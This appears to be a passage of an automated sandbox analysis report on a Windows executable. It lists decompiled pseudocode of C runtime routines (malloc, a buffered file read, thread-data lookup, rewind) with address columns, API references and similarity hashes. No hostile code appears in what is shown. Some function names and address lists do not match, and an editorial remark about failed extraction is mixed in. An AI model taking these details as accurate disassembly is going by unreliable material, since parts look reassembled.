											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
                                                                                                                                                                                          										} else {
                                                                                                                                                                                          											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                                                                                          											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                                                                                          												E00405000(_t93, 0);
                                                                                                                                                                                          												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                                                                                          												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                                                                                          												__eflags = _t74;
                                                                                                                                                                                          												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                                                                                          												return _t93;
                                                                                                                                                                                          											} else {
                                                                                                                                                                                          												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                                                                                          												return _t93;
                                                                                                                                                                                          											}
                                                                                                                                                                                          										}
                                                                                                                                                                                          									}
                                                                                                                                                                                          								}
                                                                                                                                                                                          							}
                                                                                                                                                                                          							goto L42;
                                                                                                                                                                                          							L7:
                                                                                                                                                                                          							_t62 =  *_t83;
                                                                                                                                                                                          							 *_t88 = _t62;
                                                                                                                                                                                          							_t83 = _t83 + 1;
                                                                                                                                                                                          							_t88 = _t88 + 1;
                                                                                                                                                                                          							if(_t62 != 0) {
                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                          							} else {
                                                                                                                                                                                          								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				L42:
                                                                                                                                                                                          			}
                                                                                                                                                                                          0x004057b7
                                                                                                                                                                                          0x004057bf
                                                                                                                                                                                          0x004057c3
                                                                                                                                                                                          0x004057c5
                                                                                                                                                                                          0x004057cd
                                                                                                                                                                                          0x004059c8
                                                                                                                                                                                          0x004059ce
                                                                                                                                                                                          0x004057db
                                                                                                                                                                                          0x004057e3
                                                                                                                                                                                          0x004057e5
                                                                                                                                                                                          0x004057ea
                                                                                                                                                                                          0x00405921
                                                                                                                                                                                          0x0040592a
                                                                                                                                                                                          0x004057f0
                                                                                                                                                                                          0x004057f3
                                                                                                                                                                                          0x004057f6
                                                                                                                                                                                          0x004057f9
                                                                                                                                                                                          0x004057fc
                                                                                                                                                                                          0x004057ff
                                                                                                                                                                                          0x00405801
                                                                                                                                                                                          0x00405804
                                                                                                                                                                                          0x00405807
                                                                                                                                                                                          0x0040580a
                                                                                                                                                                                          0x0040580d
                                                                                                                                                                                          0x00405810
                                                                                                                                                                                          0x00405813
                                                                                                                                                                                          0x00405816
                                                                                                                                                                                          0x00405819
                                                                                                                                                                                          0x0040581c
                                                                                                                                                                                          0x00405824
                                                                                                                                                                                          0x00405827
                                                                                                                                                                                          0x0040582b
                                                                                                                                                                                          0x0040582e
                                                                                                                                                                                          0x00405831
                                                                                                                                                                                          0x00405834
                                                                                                                                                                                          0x00405837
                                                                                                                                                                                          0x00405837
                                                                                                                                                                                          0x00405839
                                                                                                                                                                                          0x0040583a
                                                                                                                                                                                          0x00405842
                                                                                                                                                                                          0x00405847
                                                                                                                                                                                          0x0040584a
                                                                                                                                                                                          0x0040584f
                                                                                                                                                                                          0x0040591c
                                                                                                                                                                                          0x0040591c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405855
                                                                                                                                                                                          0x00405855
                                                                                                                                                                                          0x00405859
                                                                                                                                                                                          0x0040585b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405870
                                                                                                                                                                                          0x00405872
                                                                                                                                                                                          0x00405874
                                                                                                                                                                                          0x00405874
                                                                                                                                                                                          0x00405877
                                                                                                                                                                                          0x0040587b
                                                                                                                                                                                          0x00405881
                                                                                                                                                                                          0x00405881
                                                                                                                                                                                          0x00405885
                                                                                                                                                                                          0x00405889
                                                                                                                                                                                          0x00405897
                                                                                                                                                                                          0x00405899
                                                                                                                                                                                          0x004058a5
                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                          0x004058b3
                                                                                                                                                                                          0x004058b5
                                                                                                                                                                                          0x004058c1
                                                                                                                                                                                          0x004058c5
                                                                                                                                                                                          0x004058c7
                                                                                                                                                                                          0x004058c7
                                                                                                                                                                                          0x004058c8
                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                          0x0040588f
                                                                                                                                                                                          0x00405892
                                                                                                                                                                                          0x00405892
                                                                                                                                                                                          0x004058cc
                                                                                                                                                                                          0x004058cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004058d1
                                                                                                                                                                                          0x004058d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004058db
                                                                                                                                                                                          0x004058db
                                                                                                                                                                                          0x004058e0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004058e2
                                                                                                                                                                                          0x004058e4
                                                                                                                                                                                          0x00405930
                                                                                                                                                                                          0x0040593f
                                                                                                                                                                                          0x00405942
                                                                                                                                                                                          0x00405944
                                                                                                                                                                                          0x00405949
                                                                                                                                                                                          0x0040594c

APIs
• _malloc.LIBCMT ref: 004057DE
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• _malloc.LIBCMT ref: 00405842
• _malloc.LIBCMT ref: 00405906
• _malloc.LIBCMT ref: 00405930
Strings
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: _malloc$AllocateHeap
• String ID: 1.2.3
• API String ID: 680241177-2310465506
• Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
• Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
• Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
• Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 85%
E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
	signed int _v8;
	char* _v12;
	signed int _v16;
	signed int _v20;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t90;
	intOrPtr* _t92;
	signed int _t94;
	char _t97;
	signed int _t105;
	void* _t106;
	signed int _t107;
	signed int _t110;
	signed int _t113;
	intOrPtr* _t114;
	signed int _t118;
	signed int _t119;
	signed int _t120;
	char* _t121;
	signed int _t125;
	signed int _t131;
	signed int _t133;
	void* _t134;

	_t125 = __edx;
	_t121 = _a4;
	_t119 = _a8;
	_t131 = 0;
	_v12 = _t121;
	_v8 = _t119;
	if(_a12 == 0 || _a16 == 0) {
		L5:
		return 0;
	} else {
		_t138 = _t121;
		if(_t121 != 0) {
			_t133 = _a20;
			__eflags = _t133;
			if(_t133 == 0) {
				L9:
				__eflags = _t119 - 0xffffffff;
				if(_t119 != 0xffffffff) {
					_t90 = E0040BA30(_t131, _t121, _t131, _t119);
					_t134 = _t134 + 0xc;
				}
				__eflags = _t133 - _t131;
				if(__eflags == 0) {
					goto L3;
				} else {
					_t94 = _t90 | 0xffffffff;
					_t125 = _t94 % _a12;
					__eflags = _a16 - _t94 / _a12;
					if(__eflags > 0) {
						goto L3;
					}
					L13:
					_t131 = _a12 * _a16;
					__eflags =  *(_t133 + 0xc) & 0x0000010c;
					_v20 = _t131;
					_t120 = _t131;
					if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
						_v16 = 0x1000;
					} else {
						_v16 =  *((intOrPtr*)(_t133 + 0x18));
					}
					__eflags = _t131;
					if(_t131 == 0) {
						L40:
						return _a16;
                                                                                                                                                                                          								} else {
                                                                                                                                                                                          									do {
                                                                                                                                                                                          										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                          										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                          											L24:
                                                                                                                                                                                          											__eflags = _t120 - _v16;
                                                                                                                                                                                          											if(_t120 < _v16) {
                                                                                                                                                                                          												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                                                                                                                                          												__eflags = _t97 - 0xffffffff;
                                                                                                                                                                                          												if(_t97 == 0xffffffff) {
                                                                                                                                                                                          													L48:
                                                                                                                                                                                          													return (_t131 - _t120) / _a12;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												__eflags = _v8;
                                                                                                                                                                                          												if(_v8 == 0) {
                                                                                                                                                                                          													L44:
                                                                                                                                                                                          													__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                          													if(__eflags != 0) {
                                                                                                                                                                                          														E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                          														_t134 = _t134 + 0xc;
                                                                                                                                                                                          													}
                                                                                                                                                                                          													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                          													L4:
                                                                                                                                                                                          													E0040E744(_t125, _t131, _t133);
                                                                                                                                                                                          													goto L5;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t123 = _v12;
                                                                                                                                                                                          												_v12 = _v12 + 1;
                                                                                                                                                                                          												 *_v12 = _t97;
                                                                                                                                                                                          												_t120 = _t120 - 1;
                                                                                                                                                                                          												_t70 =  &_v8;
                                                                                                                                                                                          												 *_t70 = _v8 - 1;
                                                                                                                                                                                          												__eflags =  *_t70;
                                                                                                                                                                                          												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                          												goto L39;
                                                                                                                                                                                          											}
                                                                                                                                                                                          											__eflags = _v16;
                                                                                                                                                                                          											if(_v16 == 0) {
                                                                                                                                                                                          												_t105 = 0x7fffffff;
                                                                                                                                                                                          												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                          												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                          													_t105 = _t120;
                                                                                                                                                                                          												}
                                                                                                                                                                                          											} else {
                                                                                                                                                                                          												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                          												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                          													_t55 = _t120 % _v16;
                                                                                                                                                                                          													__eflags = _t55;
                                                                                                                                                                                          													_t125 = _t55;
                                                                                                                                                                                          													_t110 = _t120;
                                                                                                                                                                                          												} else {
                                                                                                                                                                                          													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                          													_t110 = 0x7fffffff;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t105 = _t110 - _t125;
                                                                                                                                                                                          											}
                                                                                                                                                                                          											__eflags = _t105 - _v8;
                                                                                                                                                                                          											if(_t105 > _v8) {
                                                                                                                                                                                          												goto L44;
                                                                                                                                                                                          											} else {
                                                                                                                                                                                          												_push(_t105);
                                                                                                                                                                                          												_push(_v12);
                                                                                                                                                                                          												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                          												_pop(_t123);
                                                                                                                                                                                          												_push(_t106);
                                                                                                                                                                                          												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                          												_t134 = _t134 + 0xc;
                                                                                                                                                                                          												__eflags = _t107;
                                                                                                                                                                                          												if(_t107 == 0) {
                                                                                                                                                                                          													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                          													goto L48;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                          												if(_t107 == 0xffffffff) {
                                                                                                                                                                                          													L47:
                                                                                                                                                                                          													_t80 = _t133 + 0xc;
                                                                                                                                                                                          													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                          													__eflags =  *_t80;
                                                                                                                                                                                          													goto L48;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_v12 = _v12 + _t107;
                                                                                                                                                                                          												_t120 = _t120 - _t107;
                                                                                                                                                                                          												_v8 = _v8 - _t107;
                                                                                                                                                                                          												goto L39;
                                                                                                                                                                                          											}
                                                                                                                                                                                          										}
                                                                                                                                                                                          										_t113 =  *(_t133 + 4);
                                                                                                                                                                                          										__eflags = _t113;
                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										if(__eflags < 0) {
                                                                                                                                                                                          											goto L47;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										_t131 = _t120;
                                                                                                                                                                                          										__eflags = _t120 - _t113;
                                                                                                                                                                                          										if(_t120 >= _t113) {
                                                                                                                                                                                          											_t131 = _t113;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										__eflags = _t131 - _v8;
                                                                                                                                                                                          										if(_t131 > _v8) {
                                                                                                                                                                                          											_t133 = 0;
                                                                                                                                                                                          											__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                          												E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                          												_t134 = _t134 + 0xc;
                                                                                                                                                                                          											}
                                                                                                                                                                                          											_t114 = E0040BFC1(__eflags);
                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                          											 *_t114 = 0x22;
                                                                                                                                                                                          											_push(_t133);
                                                                                                                                                                                          											goto L4;
                                                                                                                                                                                          										} else {
                                                                                                                                                                                          											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                                                                                          											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                                                          											 *_t133 =  *_t133 + _t131;
                                                                                                                                                                                          											_v12 = _v12 + _t131;
                                                                                                                                                                                          											_t120 = _t120 - _t131;
                                                                                                                                                                                          											_t134 = _t134 + 0x10;
                                                                                                                                                                                          											_v8 = _v8 - _t131;
                                                                                                                                                                                          											_t131 = _v20;
                                                                                                                                                                                          										}
                            L39:
                            __eflags = _t120;
                        } while (_t120 != 0);
                        goto L40;
                    }
                }
            }
            _t118 = _t90 | 0xffffffff;
            _t90 = _t118 / _a12;
            _t125 = _t118 % _a12;
            __eflags = _a16 - _t90;
            if(_a16 <= _t90) {
                goto L13;
            }
            goto L9;
        }
        L3:
        _t92 = E0040BFC1(_t138);
        _push(_t131);
        _push(_t131);
        _push(_t131);
        _push(_t131);
        *_t92 = 0x16;
        _push(_t131);
        goto L4;
    }
}

Instruction addresses for the listing above (the per-line address column of the decompiled view; the instruction text for this column was not recovered in extraction, 0x00000000 marks lines without an address):
0x0040bcc2 0x0040bcca 0x0040bcce 0x0040bcd3 0x0040bcd5 0x0040bcd8 0x0040bcde 0x0040bd01
0x00000000 0x0040bce5 0x0040bce5 0x0040bce7 0x0040bd08 0x0040bd0b 0x0040bd0d 0x0040bd1c
0x0040bd1c 0x0040bd1f 0x0040bd24 0x0040bd29 0x0040bd29 0x0040bd2c 0x0040bd2e 0x00000000
0x0040bd30 0x0040bd30 0x0040bd35 0x0040bd38 0x0040bd3b 0x00000000 0x00000000 0x0040bd3d
0x0040bd40 0x0040bd44 0x0040bd4b 0x0040bd4e 0x0040bd50 0x0040bd5a 0x0040bd52 0x0040bd55
0x0040bd55 0x0040bd61 0x0040bd63 0x0040be53 0x00000000 0x0040bd69 0x0040bd69 0x0040bd69
0x0040bd70 0x0040bdb6 0x0040bdb6 0x0040bdb9 0x0040be24 0x0040be2a 0x0040be2d 0x0040beb8
0x00000000 0x0040bebe 0x0040be33 0x0040be37 0x0040be87 0x0040be87 0x0040be8b 0x0040be95
0x0040be9a 0x0040be9a 0x0040bea2 0x0040beaa 0x0040beab 0x0040beac 0x0040bead 0x0040beae
0x0040bcf9 0x0040bcf9 0x00000000 0x0040bcfe 0x0040be39 0x0040be3c 0x0040be3f 0x0040be44
0x0040be45 0x0040be45 0x0040be45 0x0040be48 0x00000000 0x0040be48 0x0040bdbb 0x0040bdbf
0x0040bde0 0x0040bde5 0x0040bde7 0x0040bde9 0x0040bde9 0x0040bdc1 0x0040bdc8 0x0040bdca
0x0040bdd7 0x0040bdd7 0x0040bdd7 0x0040bdda 0x0040bdcc 0x0040bdce 0x0040bdd1 0x0040bdd1
0x0040bddc 0x0040bddc 0x0040bdeb 0x0040bdee 0x00000000 0x0040bdf4 0x0040bdf4 0x0040bdf5
0x0040bdf9 0x0040bdfe 0x0040bdff 0x0040be00 0x0040be05 0x0040be08 0x0040be0a 0x0040bec6
0x00000000 0x0040bec6 0x0040be10 0x0040be13 0x0040beb4 0x0040beb4 0x0040beb4 0x0040beb4
0x00000000 0x0040beb4 0x0040be19 0x0040be1c 0x0040be1e 0x00000000 0x0040be1e 0x0040bdee
0x0040bd72 0x0040bd75 0x0040bd77 0x00000000 0x00000000 0x0040bd79 0x00000000 0x00000000
0x0040bd7f 0x0040bd81 0x0040bd83 0x0040bd85 0x0040bd85 0x0040bd87 0x0040bd8a 0x0040be5b
0x0040be5d 0x0040be61 0x0040be6a 0x0040be6f
                                                                                                                                                                                          0x0040be6f
                                                                                                                                                                                          0x0040be72
                                                                                                                                                                                          0x0040be77
                                                                                                                                                                                          0x0040be78
                                                                                                                                                                                          0x0040be79
                                                                                                                                                                                          0x0040be7a
                                                                                                                                                                                          0x0040be7b
                                                                                                                                                                                          0x0040be81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd90
                                                                                                                                                                                          0x0040bd99
                                                                                                                                                                                          0x0040bd9e
                                                                                                                                                                                          0x0040bda1
                                                                                                                                                                                          0x0040bda3
                                                                                                                                                                                          0x0040bda6
                                                                                                                                                                                          0x0040bda8
                                                                                                                                                                                          0x0040bdab
                                                                                                                                                                                          0x0040bdae
                                                                                                                                                                                          0x0040bdae
                                                                                                                                                                                          0x0040be4b
                                                                                                                                                                                          0x0040be4b
                                                                                                                                                                                          0x0040be4b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                          0x0040bd63
                                                                                                                                                                                          0x0040bd2e
                                                                                                                                                                                          0x0040bd0f
                                                                                                                                                                                          0x0040bd14
                                                                                                                                                                                          0x0040bd14
                                                                                                                                                                                          0x0040bd17
                                                                                                                                                                                          0x0040bd1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd1a
                                                                                                                                                                                          0x0040bce9
                                                                                                                                                                                          0x0040bce9
                                                                                                                                                                                          0x0040bcee
                                                                                                                                                                                          0x0040bcef
                                                                                                                                                                                          0x0040bcf0
                                                                                                                                                                                          0x0040bcf1
                                                                                                                                                                                          0x0040bcf2
                                                                                                                                                                                          0x0040bcf8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bcf8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3886058894-0
                                                                                                                                                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                          • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t30 = __eflags;
                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                          				_t22 = __ebx;
                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                          				_push(0x4214d0);
                                                                                                                                                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                          				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                          				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                          				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                                          					L6:
                                                                                                                                                                                          					E0040D6E0(_t22, 0xc);
                                                                                                                                                                                          					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                          					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                          					_t26 =  *0x422f18; // 0x422e40
                                                                                                                                                                                          					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                                                                                                                                          					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                          					E004147A2();
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                          					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				if(_t28 == 0) {
                                                                                                                                                                                          					E0040E79A(_t25, _t26, 0x20);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return E0040E21D(_t28);
                                                                                                                                                                                          			}


                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                          • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                          • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                          • String ID: @.B
                                                                                                                                                                                          • API String ID: 3521780317-470711618
                                                                                                                                                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                          • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                          				intOrPtr* _t27;
                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t37 = __edx;
                                                                                                                                                                                          				_push(8);
                                                                                                                                                                                          				_push(0x421140);
                                                                                                                                                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                          				_t39 = _a4;
                                                                                                                                                                                          				_t50 = _t39;
                                                                                                                                                                                          				_t51 = _t50 != 0;
                                                                                                                                                                                          				if(_t50 != 0) {
                                                                                                                                                                                          					E0040FB29(_t39);
                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                          					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                                                                                          					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                          					__eflags = _t16 - 0xffffffff;
                                                                                                                                                                                          					if(_t16 == 0xffffffff) {
                                                                                                                                                                                          						L6:
                                                                                                                                                                                          						_t17 = 0x4227e0;
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                          						__eflags = _t21 - 0xfffffffe;
                                                                                                                                                                                          						if(_t21 == 0xfffffffe) {
                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                          						} else {
                                                                                                                                                                                          							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                          							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t9 = _t17 + 4; // 0xa80
                                                                                                                                                                                          					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                                                                                          					_v8 = 0xfffffffe;
                                                                                                                                                                                          					E0040C735(_t39);
                                                                                                                                                                                          					_t19 = 0;
                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_t27 = E0040BFC1(_t51);
                                                                                                                                                                                          					_t40 = 0x16;
                                                                                                                                                                                          					 *_t27 = _t40;
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					E0040E744(__edx, _t40, 0);
                                                                                                                                                                                          					_t19 = _t40;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return E0040E21D(_t19);
                                                                                                                                                                                          			}
                                                                                                                                                                                          Instruction addresses (one per decompiled line, in order): 0x0040c73d, 0x0040c690, 0x0040c692, 0x0040c697, 0x0040c69e, 0x0040c6a3, 0x0040c6a8, 0x0040c6aa, 0x0040c6c8, 0x0040c6ce, 0x0040c6d1, 0x0040c6d6, 0x0040c6dc, 0x0040c6df, 0x0040c70f, 0x0040c70f, 0x0040c6e1, 0x0040c6e2, 0x0040c6e8, 0x0040c6eb, 0x00000000, 0x0040c6ed, 0x0040c6ee, 0x0040c70b, 0x0040c70b, 0x0040c6eb, 0x0040c714, 0x0040c71b, 0x0040c71e, 0x0040c725, 0x0040c72a, 0x0040c72a, 0x0040c6ac, 0x0040c6ac, 0x0040c6b3, 0x0040c6b4, 0x0040c6b6, 0x0040c6b7, 0x0040c6b8, 0x0040c6b9, 0x0040c6ba, 0x0040c6bb, 0x0040c6c3, 0x0040c6c3, 0x0040c731

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
